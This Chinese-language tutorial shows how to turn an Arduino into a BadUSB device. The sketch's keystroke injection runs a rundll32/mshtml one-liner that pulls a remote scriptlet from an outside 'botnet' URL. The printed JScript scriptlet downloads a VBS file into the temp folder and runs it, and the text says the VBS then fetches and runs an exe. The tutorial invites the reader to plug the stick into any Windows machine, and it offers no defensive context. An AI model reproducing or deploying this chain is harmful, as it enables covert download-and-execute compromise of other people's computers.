准备工具
arduino编译工具,去这下载最新版本;- Bad USB 一枚;
- Windows电脑一台;
开发步骤
打开arduino,配置端口;
新建一个文件,复制以下代码:
#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(3000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(50);
Keyboard.press('r');//r键
delay(100);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(800);
Keyboard.println("rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://www.e4ting.cn/botnet/payload_test.xml\") "); //注意最后有一个空格
}
void loop() {
// put your main code here, to run repeatedly:
}
如图,点验证/编译、上传,就完成了整个制作过程。
接下来就可以把(Bad)USB插到任意Windows上去跑了。
代码说明
核心代码是:
Keyboard.println("rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://www.e4ting.cn/b/payload_test.xml\") ");
https 在某些系统中会证书报错。
这只是一条0 file run命令。真正的代码在http://www.e4ting.cn/b/payload_test.xml中。这是一个JavaScript脚本。脚本会引导vbs,下载一个exe到本地执行。
<?xml version="1.0"?>
<package>
<component id="botnet">
<script language="JScript">
<![CDATA[
var temp = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%Temp%");
var target = temp + '\\payload.vbs';
var targetExe = temp + '\\login.test.exe';
var objXML = new ActiveXObject("Msxml2.ServerXMLHTTP");
objXML.open('GET', 'http://www.e4ting.cn/b/payload.vbs' , false);
objXML.send();
var ado = new ActiveXObject("Adodb.Stream");
ado.type = 1;
ado.open();
ado.write(objXML.responseBody);
ado.SaveToFile(target,2);
ado.close();
var r3 = new ActiveXObject("WScript.Shell").Run(target + ' ' + targetExe);
]]>
</script>
</component>
</package>
